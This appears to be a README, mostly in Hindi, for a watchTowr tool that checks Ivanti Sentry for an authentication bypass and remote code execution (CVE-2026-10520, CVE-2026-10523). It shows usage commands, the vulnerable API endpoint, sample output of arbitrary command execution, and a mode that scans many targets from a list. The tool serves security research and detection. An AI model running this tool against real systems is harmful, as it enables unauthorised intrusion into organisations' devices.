
Ivanti Sentry प्रमाणीकरण बायपास और RCE भेद्यताओं (CVE-2026-10520, CVE-2026-10523) के लिए डिटेक्शन आर्टिफैक्ट जनरेटर। एक या एकाधिक लक्ष्यों को स्कैन करता है, कमांड निष्पादित करता है, और भेद्य होस्टों की रिपोर्ट करता है।
एक Ivanti Sentry प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन डिटेक्शन आर्टिफैक्ट जनरेटर।
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें।
$ python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
CVE-2026-10523.py
(*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2026-10520, CVE-2026-10523]
============================================================
Target: https://127.0.0.1
Command: uname -a
[+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux
एकल लक्ष्य:
python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
फ़ाइल से कई लक्ष्य (प्रति पंक्ति एक URL, रिक्त पंक्तियाँ और # टिप्पणियाँ अनदेखी की जाती हैं):
python3 CVE-2026-10523.py -l targets.txt --cmd "uname -a"
प्रॉक्सी का उपयोग करें:
python3 CVE-2026-10523.py -l targets.txt --cmd "id" -p 127.0.0.1:8080
लिस्ट मोड हर लक्ष्य को स्कैन करता है, कनेक्शन त्रुटियों पर जारी रहता है, और अंत में कमजोर होस्ट्स का सारांश प्रिंट करता है।
यह watchTowr डिटेक्शन आर्टिफैक्ट जनरेटर Ivanti Sentry प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन कमजोरियों CVE-2026-10520, CVE-2026-10523 की जाँच करता है।
उपचार और आगे के विवरण Ivanti एडवाइजरी में पाए जा सकते हैं: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523
श्रेय: